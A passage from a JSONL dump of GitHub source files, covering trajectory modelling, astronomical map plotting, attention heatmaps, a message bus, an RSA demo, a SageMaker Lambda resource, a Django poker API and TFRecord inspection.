market.replace('---', '/')\n stock = get_price(market)\n return jsonify(stock['result'])\n","repo_name":"StephaneConq/TradingToolBack","sub_path":"blueprints/ftx.py","file_name":"ftx.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15574447575","text":"import numpy as np\nimport copy\nimport math\nimport map_processor\n\n\nclass TrajectoryProcessor(map_processor.MapProcessor):\n def __init__(self, n_x_lattice):\n super().__init__(n_x_lattice)\n self.transition_mat = None\n \n def generate(self, len_traj):\n if self.transition_mat is None:\n print(\"you must initially load\")\n \n traj = []\n \n start = self._choice()\n \n for i in range(len_traj):\n \n traj.append(start)\n \n cur_posi = np.zeros((1, self.size))\n cur_posi[0, start] = 1\n dist = np.dot(cur_posi, self.transition_mat)\n \n if dist.sum() == 0:\n continue\n \n next_posi = np.random.choice(range(self.size), p=dist[0])\n \n start = next_posi\n return traj \n \n def compute_possible_set(self, prior, delta=0):\n \n if delta == 0:\n \n state_nos = np.where(prior>0)[0]\n n_possible_loc = len(state_nos)\n #print(\"n_possible_loc\", n_possible_loc)\n \n return state_nos\n \n else:\n \n state_nos, delta_X = self.compute_delta_set(prior, delta)\n return state_nos\n \n def update_graph_mat(self, possible_states):\n updated_graph_mat = copy.deepcopy(self.graph_mat)\n for state in range(len(updated_graph_mat)):\n if state not in possible_states:\n updated_graph_mat[state,:] = 0\n updated_graph_mat[:, state] = 0\n \n return updated_graph_mat\n \n def compute_delta_set(self, prior, delta):\n \n temp_prior = copy.deepcopy(prior)\n \n while (np.sum(temp_prior) > 1-delta):\n\n temp_prior[temp_prior == 0] = float(\"inf\")\n min_ind = np.argmin(temp_prior)\n min_prob = prior[min_ind]\n temp_prior[min_ind] = 0\n temp_prior[temp_prior == float(\"inf\")] = 0\n \n if np.sum(temp_prior != 0) == 0:\n break\n \n if prior[min_ind] > 0:\n temp_prior[min_ind] = min_prob\n \n n_possible_loc = np.sum(temp_prior>0)\n \n \n deltaX = np.zeros((n_possible_loc, self.size))\n \n state_nos = np.where(temp_prior>0)[0]\n for i, state_no in enumerate(state_nos):\n deltaX[i,state_no] = 1\n \n return state_nos, deltaX\n \n \n def compute_posterior_distribution(self, prior):\n if self.transition_mat is None:\n print(\"you must initially load\")\n \n posterior = np.dot(prior, self.transition_mat)\n \n if posterior.sum() == 0:\n print(\"end\")\n \n return posterior\n \n def traj_to_states(self, traj):\n state_traj = []\n for latlon in traj:\n if not self._is_in_from_latlon(latlon):\n continue\n state = self._find_nearest_state_from_latlon_in_all_states(latlon)\n state_traj.append(state)\n return state_traj\n \n def trajs_to_state_trajs(self, trajs):\n state_trajs = []\n for traj in trajs:\n state_traj = self.traj_to_states(traj)\n if len(state_traj) != 0:\n state_trajs.append(state_traj)\n return state_trajs\n \n def make_transmat_from_state_trajs(self, state_trajs):\n transition_mat = np.zeros((self.n_state, self.n_state))\n for state_traj in state_trajs:\n pre_state = state_traj[0]\n for state in state_traj[1:]:\n transition_mat[pre_state, state] += 1\n pre_state = state\n self.transition_mat = self._normalize(transition_mat)\n \n def make_transmat_from_trajs(self, trajs):\n transition_mat = np.zeros((self.n_state, self.n_state))\n for traj in trajs:\n pre_state = self._find_nearest_state_from_latlon_in_all_states(traj[0])\n for latlon in traj:\n if 
self._is_in_from_latlon(latlon):\n state = self._find_nearest_state_from_latlon_in_all_states(latlon)\n transition_mat[pre_state, state] += 1\n \n pre_state = state\n else:\n break \n self.transition_mat = self._normalize(transition_mat)\n \n def _normalize(self, transition_mat):\n transition_mat = copy.deepcopy(transition_mat)\n for i, transition_prob in enumerate(transition_mat):\n sum_ = np.sum(transition_prob)\n if sum_ != 0:\n transition_mat[i,:] = transition_mat[i,:]/sum_\n return transition_mat\n \n \n def load_trans_mat(self, path_transition_mat, traj, threashold=1e-4):\n \n transition_mat = np.loadtxt(path_transition_mat)\n self.transition_mat = self._threash(transition_mat, threashold)\n self._modify_for_test_traj(traj)\n self.size = len(self.transition_mat)\n \n \n def _threash(self, transition_mat, threashold):\n transition_mat = copy.deepcopy(transition_mat)\n transition_mat = transition_mat * (transition_mat >= threashold)\n transition_mat = self._normalize(transition_mat)\n return transition_mat\n \n \n def _modify_for_test_traj(self, test_traj):\n for i in range(len(test_traj) - 1):\n pre_loc = test_traj[i]\n pos_loc = test_traj[i+1]\n if pre_loc != pos_loc:\n self.transition_mat[pre_loc][pos_loc] += 0.1","repo_name":"tkgsn/PGLP","sub_path":"src/trajectory_processor.py","file_name":"trajectory_processor.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"5329192380","text":"from kapteyn import maputils\nimport numpy\nfrom service import *\n\nfignum = 35\nfig = plt.figure(figsize=figsize)\nframe = fig.add_axes(plotbox)\ntitle = r\"\"\"COBE quadrilateralized spherical cube projection (CSC) oblique with:\n$(\\alpha_p,\\delta_p) = (0^\\circ,30^\\circ)$, $\\phi_p = 75^\\circ$ also: \n$(\\phi_0,\\theta_0) = (0^\\circ,90^\\circ)$. (Cal. 
fig.34d)\"\"\"\nheader = {'NAXIS' : 2, 'NAXIS1': 100, 'NAXIS2': 80,\n 'CTYPE1' : 'RA---CSC',\n 'CRVAL1' : 0.0, 'CRPIX1' : 85, 'CUNIT1' : 'deg', 'CDELT1' : -4.0,\n 'CTYPE2' : 'DEC--CSC',\n 'CRVAL2' : 30.0, 'CRPIX2' : 40, 'CUNIT2' : 'deg', 'CDELT2' : 4.0,\n 'LONPOLE': 75.0,\n 'PV1_1' : 0.0, 'PV1_2' : 90.0,\n }\nX = numpy.arange(0,370.0,30.0)\nY = numpy.arange(-60,90,30.0)\nf = maputils.FITSimage(externalheader=header)\nannim = f.Annotatedimage(frame)\ngrat = annim.Graticule(axnum= (1,2), wylim=(-90,90.0), wxlim=(-180,180),\n startx=X, starty=Y)\ngrat.setp_lineswcs0(0, lw=2)\ngrat.setp_lineswcs1(0, lw=2)\n# Take border from non-oblique version\nheader['CRVAL2'] = 0.0\ndel header['PV1_1']\ndel header['PV1_2']\ndel header['LONPOLE']\nborder = annim.Graticule(header, axnum= (1,2), wylim=(-90,90.0), wxlim=(-180,180),\n skipx=True, skipy=True)\nperimeter = getperimeter(border)\nlon_world = list(range(0,360,30))\nlat_world = [-60, -30, 30, 60]\nlabkwargs0 = {'color':'r', 'va':'center', 'ha':'left'}\nlabkwargs1 = {'color':'b', 'va':'top', 'ha':'center'}\ndoplot(frame, fignum, annim, grat, title,\n lon_world=lon_world, lat_world=lat_world,\n labkwargs0=labkwargs0, labkwargs1=labkwargs1,\n perimeter=perimeter, markerpos=markerpos)\n","repo_name":"kapteyn-astro/kapteyn","sub_path":"doc/source/EXAMPLES/allskyf35.py","file_name":"allskyf35.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"12489151931","text":"'''\nCreate attention heatmaps per paragraph sentence for all images,\nheatmaps are created with objects which were linked with noun phrase,\none can choose which linking method to take and visualise (check parameters in the main loop).\n'''\n\nimport argparse\nimport base64\nimport json\nimport tqdm\nimport numpy as np\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport cv2\n\nimport spacy\nspacy_nlp = spacy.load('en_core_web_sm')\n\n\n\ndef image_box_resize(image,\n bboxes):\n\n \"\"\"Resize bounding boxes from original coordinates to the scaled ones.\n Args:\n image: original image\n bboxes: (x, y, xmax, ymax) coordinates of bounding boxes\n Returns:\n img: original image, resized (scaled)\n boxes_scaled: newly scaled bounding boxes\n \"\"\"\n\n boxes_scaled = []\n image_to_show = cv2.imread(image, 3)\n y_dim = image_to_show.shape[0]\n x_dim = image_to_show.shape[1]\n target_size = 2000\n x_scale = target_size / x_dim\n y_scale = target_size / y_dim\n img = cv2.resize(image_to_show, (target_size, target_size))\n img = np.array(img)\n for box in bboxes:\n origleft, origtop, origright, origbottom = box[0], box[1], box[2], box[3]\n x_scaled = int(np.round(origleft * x_scale))\n y_scaled = int(np.round(origtop * y_scale))\n xmax = int(np.round(origright * x_scale))\n ymax = int(np.round(origbottom * y_scale))\n boxes_scaled.append([x_scaled, y_scaled, xmax, ymax])\n return (\n img,\n boxes_scaled\n )\n\n\n\n\ndef image_vis(this_image,\n boxes_to_visualise,\n all_boxes,\n sent_id,\n image_path,\n save_path):\n\n \"\"\"Visualisation of linked bounding boxes on top of the image.\n Args:\n this_image: image id\n boxes_to_visualise: ids of linked bounding boxes\n all_boxes: coordinates of original bounding boxes\n sent_id: current sentence id in the paragraph\n image_path: path to ADE20k images\n Returns:\n saves heatmaps per sentence per image\n \"\"\"\n\n # open correct image; val image ids are > 100000\n this_image = int(this_image)\n if 
this_image > 100000:\n this_image = this_image - 100000\n val_this_image = \"%08d\" % (this_image,)\n val_this_image = f'ADE_val_{str(val_this_image)}.jpg'\n image = image_path + str(val_this_image)\n else:\n train_this_image = \"%08d\" % (this_image,)\n train_this_image = f'ADE_train_{str(train_this_image)}.jpg'\n image = image_path + str(train_this_image)\n boxes_filtered = [all_boxes[k] for k in boxes_to_visualise]\n # transform last two values in each box into xmax and ymax\n transformed_boxes = []\n for (x_coord, y_coord, width, height) in boxes_filtered:\n xmax = x_coord + width\n ymax = y_coord + height\n transformed_boxes.append([x_coord, y_coord, xmax, ymax])\n # adjust bounding boxes based on the resized image\n img_rescaled, boxes_rescaled = image_box_resize(image, transformed_boxes)\n # controlling how stretched the bounding box should be\n figure(figsize=(12, 18), dpi=80)\n plt.axis('off')\n plt.tight_layout()\n img = Image.fromarray(img_rescaled)\n white_img = 255 * np.ones((img.size[1], img.size[0] , 3), np.uint8)\n plt.imshow(white_img)\n for bbox in boxes_rescaled:\n if bbox[0] == 0:\n bbox[0] = 1\n if bbox[1] == 0:\n bbox[1] = 1\n plt.gca().add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n (bbox[2] - bbox[0]) - bbox[0],\n (bbox[3] - bbox[1]) - bbox[1], fill=True,\n linewidth=2, alpha=1, color='#00008B')\n )\n\n sid = str(int(sent_id) + 1)\n plt.savefig(f'{save_path}/s{sid}-' + str(this_image) + '.jpg')\n plt.close()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f',\n '--feat_path',\n help='Path to the image features',\n default='/scratch/nikolai/tmm_dataset/frcnn_tellmemore/',\n required=False)\n parser.add_argument('-i',\n '--image_path',\n help='Path to the tell me more images',\n default='/scratch/nikolai/tmm_dataset/tell_me_more/',\n required=False)\n parser.add_argument('-l',\n '--linking_method_type',\n help='Choose linking method to visualise;\\\n full set can be found in res_formatted.json',\n default='L-(A)(N)-1-M',\n required=False)\n parser.add_argument('-m',\n '--filter_method',\n help='Pick a filtering method that was used with linking,\\\n they should be identical',\n default='(A)(N)',\n required=False)\n parser.add_argument('-r',\n '--results_file',\n help='Path to the file with formatted results of linking',\n default='./res_formatted_run-20220813-162422.json',\n required=False)\n parser.add_argument('-o',\n '--output_path',\n help='Path to save heatmaps for all images for the specific sentence id',\n default='./where',\n required=False)\n args = vars(parser.parse_args())\n\n with open(args['results_file'], 'r', encoding='UTF-8') as a:\n links = json.load(a)\n\n for num, (image_id, v) in tqdm.tqdm(enumerate(links.items())):\n feat_file = args['feat_path'] + str(image_id) + '.npz'\n feat_loaded = np.load(feat_file)\n boxes = np.frombuffer(base64.b64decode(feat_loaded['boxes']),\n dtype=np.float32).reshape(36, 4).copy()\n nps = v['NPS-OBJ']\n objs = v[f'{args[\"linking_method_type\"]}']\n # per sentence\n for sentid in range(5):\n nouns = [(iid, i[1]) for iid, i in enumerate(nps) if i[0] == sentid]\n noun_ids = [iid for iid, i in nouns]\n objids = []\n for p in noun_ids:\n if isinstance(objs[str(p)], list):\n for pp in objs[str(p)]:\n if pp != 'NONE':\n objids.append(pp)\n else:\n if objs[str(p)] != 'NONE':\n objids.append(objs[str(p)])\n boxes_to_show = [k for (k, kk) in v[f'{args[\"filter_method\"]}']]\n boxes_to_show_for_sent = [i for i in boxes_to_show if i in objids]\n image_vis(image_id,\n 
boxes_to_show_for_sent,\n boxes,\n sentid,\n args['image_path'],\n args['output_path'])\n","repo_name":"GU-CLASP/discourse-and-decodings","sub_path":"scripts/where_vis.py","file_name":"where_vis.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39370779376","text":"import logging\nfrom typing import Callable, Type\n\nfrom tenacity import Retrying, RetryError\nfrom tenacity.stop import stop_after_attempt\nfrom tenacity.wait import wait_exponential\n\nfrom app.domain import events, commands\nfrom app.service_layer import handlers, unit_of_work\nfrom app.adapters import email # assumed location of the adapter exposing send_mail()\n\n\nMessage = commands.Command | events.Event\nlogger = logging.getLogger(__name__)\n\n\ndef handle(message: Message, uow: unit_of_work.AbstractUnitOfWork):\n results = []\n queue = [message]\n \n while queue:\n # take the next message off the queue; handlers may enqueue new events\n message = queue.pop(0)\n\n if isinstance(message, events.Event):\n handle_event(message, queue=queue, uow=uow)\n\n elif isinstance(message, commands.Command):\n cmd_result = handle_command(message, queue=queue, uow=uow)\n results.append(cmd_result)\n\n else:\n raise Exception(f\"{message} was not an Event or Command\")\n\n return results\n\n\ndef handle_event(event: events.Event, queue: list[Message], uow: unit_of_work.AbstractUnitOfWork):\n for handler in EVENT_HANDLERS[type(event)]:\n try:\n for attempt in Retrying(stop=stop_after_attempt(3), wait=wait_exponential()):\n\n with attempt:\n logger.debug(f\"handling event {event} with handler {handler}\")\n handler(event, uow=uow)\n queue.extend(uow.collect_new_events())\n\n except RetryError as retry_failure:\n logger.exception(f\"Failed to handle the event after {retry_failure.last_attempt.attempt_number} attempts, giving up!\")\n continue\n\n\ndef handle_command(command: commands.Command, queue: list[Message], uow: unit_of_work.AbstractUnitOfWork):\n logger.debug(f\"handling command {command}\")\n \n try:\n handler = COMMAND_HANDLERS[type(command)]\n result = handler(command, uow=uow)\n queue.extend(uow.collect_new_events())\n return result\n except Exception:\n logger.exception(f\"Exception handling command {command}\")\n raise\n\n\ndef send_out_of_stock_notification(event: events.OutOfStock):\n email.send_mail(\n \"stock@made.com\",\n f\"Article {event.sku} is out of stock.\",\n )\n\n\nEVENT_HANDLERS: dict[Type[events.Event], list[Callable]] = {\n events.OutOfStock: [send_out_of_stock_notification],\n}\n\n\nCOMMAND_HANDLERS: dict[Type[commands.Command], Callable] = {\n commands.Allocate: handlers.allocate,\n commands.CreateBatch: handlers.add_batch,\n commands.ChangeBatchQuantity: handlers.change_batch_quantity,\n}\n\n","repo_name":"maximovd/architecture-patterns-python","sub_path":"app/service_layer/messagebus.py","file_name":"messagebus.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27611912436","text":"import rsa\n\npublicKey, privateKey = rsa.newkeys(512)\n\nmessage = \"Hello Promesa\"\n\nencMessage = rsa.encrypt(message.encode(), publicKey)\n\nprint(\"Original String: \", message)\nprint(\"Encrypted String: \", encMessage)\n\ndecMessage = rsa.decrypt(encMessage, privateKey).decode()\nprint(\"Decrypted String: \", decMessage)\n\n","repo_name":"iampromesa/PYTHON-PROJECTS","sub_path":"RELEARNING/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13926488868","text":"import main\nfrom 
interface.types import type_extension\nfrom interface.standard import Save_file, Validate_format\nfrom fastapi import UploadFile, File\nfrom pathlib import Path\nimport os\nimport shutil\nfrom helpers.text import convert_pdf_to_text, convert_docx_to_text, convert_pptx_to_text, convert_rtf_to_text, convert_text_to_object, clean_text\n\ndef save_file(file: UploadFile = File(...)) -> Save_file:\n is_valid_format = validate_format(str(file.filename))\n if is_valid_format.status:\n file_destination = Path(main.url_location, \"static\", \"documents\", file.filename)\n if not os.path.exists(file_destination):\n os.makedirs(os.path.dirname(file_destination), exist_ok=True)\n with open(file_destination, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n return Save_file(status= True, url_file= file_destination)\n return Save_file(status= False, url_file= '')\n\ndef validate_format(extension_name:str) -> Validate_format:\n status = False\n type_file = ''\n for ext in type_extension:\n if extension_name.endswith(type_extension[ext]):\n status = True\n type_file = type_extension[ext]\n break\n return Validate_format(status=status, type_file= type_file)\n\ndef file_converter(url_file:Path):\n file = validate_format(str(url_file))\n if file.status:\n if file.type_file == type_extension['PDF']:\n text = convert_pdf_to_text(url_file)\n elif file.type_file == type_extension['WORD']:\n text = convert_docx_to_text(url_file)\n elif file.type_file == type_extension['PWP']:\n text = convert_pptx_to_text(url_file)\n elif file.type_file == type_extension['RTF']:\n text = convert_rtf_to_text(url_file)\n return convert_text_to_object(clean_text(text))","repo_name":"quiku2021/wiku","sub_path":"helpers/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7647663089","text":"\"\"\"Custom CloudFormation Resource to describe details of an existing SMStudio domain\n\nYou might want to do this if you:\n- Know a SageMaker Studio domain is present but don't know its ID\n- Need to know some other attribute not listed in AWS::SageMaker::Domain outputs\n\nhttps://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-domain.html\n\nThis resource will fail if no SMStudio domain is present in the region, or a DomainID is passed which does\nnot exist.\n\"\"\"\n\n# Python Built-Ins:\nimport logging\nimport traceback\n\n# External Dependencies:\nimport boto3\nimport cfnresponse\n\nsmclient = boto3.client(\"sagemaker\")\n\n# The set of DescribeDomain response props that will be passed through to cfn output:\nSUPPORTED_PROPS = {\n \"DomainArn\",\n \"DomainId\",\n \"DomainName\",\n \"HomeEfsFileSystemId\",\n \"SingleSignOnManagedApplicationInstanceId\",\n \"Status\",\n \"AuthMode\",\n \"DefaultUserSettings\",\n \"AppNetworkAccessType\",\n \"HomeEfsFileSystemKmsKeyId\",\n \"SubnetIds\",\n \"Url\",\n \"VpcId\",\n \"KmsKeyId\",\n}\n\ndef lambda_handler(event, context):\n try:\n request_type = event[\"RequestType\"]\n if request_type == \"Create\":\n handle_create(event, context)\n elif request_type == \"Update\":\n handle_update(event, context)\n elif request_type == \"Delete\":\n handle_delete(event, context)\n else:\n cfnresponse.send(\n event,\n context,\n cfnresponse.FAILED,\n {},\n error=f\"Unsupported CFN RequestType '{request_type}'\",\n )\n except Exception as e:\n logging.error(\"Uncaught exception in CFN custom resource handler - reporting failure\")\n 
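# Surface the full stack trace in the Lambda logs before signaling FAILED; the\n # re-raise below also marks the Lambda invocation itself as failed.\n 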
traceback.print_exc()\n cfnresponse.send(\n event,\n context,\n cfnresponse.FAILED,\n {},\n error=str(e),\n )\n raise e\n\n\nclass NoStudioDomains(RuntimeError):\n pass\n\n\ndef infer_domain_id():\n domains_resp = smclient.list_domains()\n if \"NextToken\" in domains_resp:\n logging.warning(\n f\"Ignoring NextToken on sagemaker:ListDomains response - pagination not implemented\"\n )\n domain_ids = [d[\"DomainId\"] for d in domains_resp[\"Domains\"]]\n\n if not (len(domain_ids) > 0):\n # If the domain has been deleted, the user must necessarily have been deleted too!\n raise NoStudioDomains(f\"No SageMaker Studio domain exists in this region!\")\n elif len(domain_ids) > 1:\n logging.warning(\n f\"Found {len(domain_ids)} Studio domains in this region: assuming first is target. {domain_ids}\"\n )\n return domain_ids[0]\n\n\ndef handle_create(event, context):\n logging.info(\"**Received create request\")\n domain_id = event[\"ResourceProperties\"].get(\"DomainId\")\n if domain_id is None:\n logging.info(\"Inferring domain ID\")\n domain_id = infer_domain_id()\n\n logging.info(f\"Querying domain {domain_id}\")\n desc = smclient.describe_domain(DomainId=domain_id)\n result = { k: desc[k] for k in desc.keys() if k in SUPPORTED_PROPS }\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n result,\n physicalResourceId=domain_id,\n )\n\n\ndef handle_delete(event, context):\n logging.info(\"**Received delete event\")\n logging.info(\"Descriptive resource - nothing to delete\")\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n {},\n physicalResourceId=event[\"PhysicalResourceId\"],\n )\n\n\ndef handle_update(event, context):\n \"\"\"Literally same process as create, for now - so as to always re-describe in case of changes\n \"\"\"\n logging.info(\"**Received update event\")\n domain_id = event[\"ResourceProperties\"].get(\"DomainId\")\n if domain_id is None:\n logging.info(\"Inferring domain ID\")\n domain_id = infer_domain_id()\n\n logging.info(f\"Querying domain {domain_id}\")\n desc = smclient.describe_domain(DomainId=domain_id)\n result = { k: desc[k] for k in desc.keys() if k in SUPPORTED_PROPS }\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n result,\n physicalResourceId=domain_id,\n )\n","repo_name":"apac-ml-tfc/intro-to-mlops","sub_path":".infrastructure/fn-describedomain/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5564871497","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom . import serializers\nfrom django.contrib.auth.models import User\nfrom game.models import Game\nfrom accounts.models import Profile\nfrom . 
import handler\nfrom django.contrib.auth import authenticate, login\nimport uuid\nfrom .models import Token\n\ndef random__hash():\n    return uuid.uuid4().hex\n\n@api_view(['GET'])\ndef index(request):\n    f = open('api_methods.txt')\n    file = f.read().split('\\n')\n    f.close()\n    obj = {'info': file}\n    return Response(obj)\n\n@api_view(['GET'])\ndef list_users(request):\n    users = User.objects.all()\n    serializer = serializers.UserSerializer(users, many=True)\n    return Response(serializer.data)\n\n@api_view(['GET'])\ndef list_games(request):\n    queryset = Game.objects.all()\n    serializer = serializers.GameSerializer(queryset, many=True)\n    return Response(serializer.data)\n\n####\n###########TOKENS\n####\n\n@api_view(['POST'])\ndef get_new_token(request):\n    username = request.data.get('username')\n    password = request.data.get('password')\n    print('username:',username,'password:',password)\n    user = authenticate(request,username=username, password=password)\n    if not user:\n        return Response({'error': 2, 'message': 'invalid credential'})\n    #login(request, user)\n    token = Token.objects.create(user=user,hash=random__hash(),scope=1)\n    obj = {\n        'username': user.username,\n        'token': token.hash\n    }\n    return Response(obj)\n\n@api_view(['GET'])\ndef delete_token(request,pk):\n    try:\n        token = Token.objects.get(hash__exact = pk)\n        token.delete()\n    except:\n        return Response({'error_code': 1,'message':'invalid token'})\n    return Response({'success': 'token deleted'})\n\n@api_view(['GET'])\ndef token_status(request,pk):\n    try:\n        token = Token.objects.get(hash__exact = pk)\n    except:\n        return Response({'error_code': 1, 'message': 'invalid token'})\n    return Response({'success':'token is active','owner':token.user.username})\n\n@api_view(['POST'])\ndef token_list(request):\n    username = request.data.get('username')\n    passw = request.data.get('password')\n    u = authenticate(request,username=username, password=passw)\n    if not u:\n        return Response('Not Authenticated')\n    user_tokens = []\n    for token in Token.objects.all():\n        if token.user.username == u.username:\n            user_tokens.append(token.hash)\n    # todo: handle the case where the user has no tokens at all\n    answer = {'success': 'Token got', 'tokens': user_tokens}\n    return Response(answer)\n\n#####\n################## IN-GAME\n#####\n\n@api_view(['GET'])\ndef game_by_id(request,id):\n    game = Game.objects.get(id=id)\n    serializer = serializers.GameSerializer(game)\n    game_obj = handler.read_game(id)\n    new_players = []\n    for player_json in game_obj['players']:\n        new_player_obj = User.objects.get(username__exact = player_json['username'])\n        serializer2 = serializers.UserSerializer(new_player_obj)\n        new_players.append(serializer2.data)\n    game_obj['players'] = new_players\n    return Response(game_obj)\n\n@api_view(['POST'])\ndef create_game(request):\n    try: \n        user_token = request.data.get('token')\n    except:\n        return Response({\"error_code\":3,'message':'Token required'})\n    try:\n        token = Token.objects.get(hash__exact = user_token)\n    except:\n        return Response({'error_code': 1,'message': 'Invalid token'})  \n    \n    owner = User.objects.get(id = token.user.id)\n    game = Game.objects.create(game_owner=owner.id,players=owner.username)\n    in_game_players = []\n    for player_name in list(game.players.split(\" \")):\n        player = User.objects.get(username__exact = player_name)\n        p = serializers.UserSerializer(player)\n        in_game_players.append(p.data)\n    jsong_obj = {\n        'PokerFold: Game': \"version 0.01\",\n        'id':game.id,\n        'status':game.status,\n        'owner':game.game_owner,\n        'players': in_game_players,\n    }\n    handler.write_game(game.id,jsong_obj)\n    return 
Response({'success':'game created', 'game_id':game.id,'game_owner': game.game_owner})\n\n@api_view(['POST'])\ndef join_the_game(request):\n    try:\n        game = Game.objects.get(id = request.data.get('gameid'))\n    except:\n        return Response({'error_code':4,'message': 'That game never existed','requested_game':request.data.get('gameid')})\n    \n    # todo: check whether the game is already full\n    try:\n        user_token = request.data.get('token')\n    except:\n        return Response({'error_code': 3, 'message': 'Token required'})\n    \n    try:\n        token = Token.objects.get(hash = user_token)\n    except:\n        return Response({'error_code':1, 'message':'invalid token'})\n\n    game_file = handler.read_game(request.data.get('gameid'))\n    new_player_obj = User.objects.get(id = token.user.id)\n    serializer2 = serializers.UserSerializer(new_player_obj)\n    # todo: check whether the player is already in the game\n    game_file['players'].append(serializer2.data)\n    handler.write_game(request.data.get('gameid'),game_file)\n    return Response({'success':'u r in da game'})\n\n@api_view(['POST'])\ndef leave_the_game(request):\n    try:\n        game = Game.objects.get(id = request.data.get('gameid'))\n    except:\n        return Response({'error_code':4,'message': 'That game never existed','requested_game':request.data.get('gameid')})\n\n    try:\n        user_token = request.data.get('token')\n    except:\n        return Response({'error_code': 3, 'message': 'Token required'})\n\n    try:\n        token = Token.objects.get(hash = user_token)\n    except:\n        return Response({'error_code':1, 'message':'invalid token'})\n\n    game_file = handler.read_game(request.data.get('gameid'))\n    username = User.objects.get(id = token.user.id).username\n    #serializer2 = serializers.UserSerializer(new_player_obj)\n    # todo: check that the player was actually in the game\n    for i in range(len(game_file['players'])):\n        if game_file['players'][i]['username'] == username:\n            game_file['players'].pop(i)\n            break\n    handler.write_game(request.data.get('gameid'),game_file)\n    return Response({'success':'u r leaved da game'})\n","repo_name":"Icawi/PokerFold","sub_path":"api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"18089567981","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nimport drone_tfrecords as tfr\nimport drone_input\n\nBATCH_SIZE = 100 # read how many tfrecords per batch\nMAX_STEPS = 3 # display how many batches\nDISPLAY_PER_BATCH = 2 # display images per batch\nNEW_IMAGE_SIZE = 101 # for viewing resized images\n\n\ndef check_tfrs(data_dir, max_steps, batch_size, type):\n    with tf.Session() as sess:\n        images, heights, widths, depths, label_ids, label_txts, filenames = drone_input.input_pipeline(\n            data_dir, batch_size, type, transform=None)\n\n        coord = tf.train.Coordinator()\n        # Note: QueueRunner created in drone_input.py\n        threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n        try:\n            step = 0\n            while step < max_steps and not coord.should_stop():\n                images_r, heights_r, widths_r, depths_r, label_ids_r, label_txts_r, filenames_r = sess.run(\n                    [\n                        images, heights, widths, depths, label_ids, label_txts,\n                        filenames\n                    ])\n\n                anchor = BATCH_SIZE // DISPLAY_PER_BATCH\n                for i in range(len(images_r)):\n                    if (i + 1) % anchor == 0:\n                        print('height: %d, width: %d, depth: %d' %\n                              (heights_r[i], widths_r[i], depths_r[i]))\n                    print('label_id: 
%s, label_txt: %s, filename: %s' %\n (label_ids_r[i], label_txts_r[i], filenames_r[i]))\n print('label: %d' % (np.argmax(label_ids_r[i])) ) \n #print(images_r[i].size)\n img = images_r[i].reshape(\n [heights_r[i], widths_r[i], depths_r[i]])\n plt.imshow(np.around(img).astype(np.uint8))\n plt.show()\n\n if (heights_r[i] != NEW_IMAGE_SIZE or widths_r[i] != NEW_IMAGE_SIZE):\n re_image = tf.image.resize_images(images_r[i].reshape(\n [heights_r[i], widths_r[i], depths_r[i]]),\n NEW_IMAGE_SIZE, NEW_IMAGE_SIZE)\n img2 = sess.run(re_image)\n plt.imshow(np.around(img2).astype(np.uint8))\n plt.show()\n step += 1\n\n except tf.errors.OutOfRangeError:\n print('Done check for %d samples' % (step * BATCH_SIZE))\n\n finally:\n # When done, ask the threads to stop\n coord.request_stop()\n\n coord.join(threads)\n\n\ndef run():\n tfr_dir = os.path.join(os.getcwd(), 'drone_data', 'tfrecord')\n print('Check training set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE, drone_input.DataTypes.train)\n print('Check validation set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE,\n drone_input.DataTypes.validation)\n print('Check testing set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE, drone_input.DataTypes.test)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"winston-li/tensorflow_playground","sub_path":"python/drone/display_tfrecords.py","file_name":"display_tfrecords.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69811573585","text":"# -*- coding:utf-8 -*-\n'''\n求1-N之间所有整数中1出现的次数之和\n'''\nclass Solution:\n def NumberOf1Between1AndN_Solution(self, n):\n # write code here\n return countOne(str(n))\ndef countOne(n):\n if int(n) == 0:\n return 0\n if len(n) == 1:\n return 1\n res = count(n)\n return res + countOne(n[1:])\n\ndef count(n):\n h = int(n[0])\n tail = int(n[1:])\n l = len(n)\n if h ==1:\n oh = tail+1\n else:\n oh = 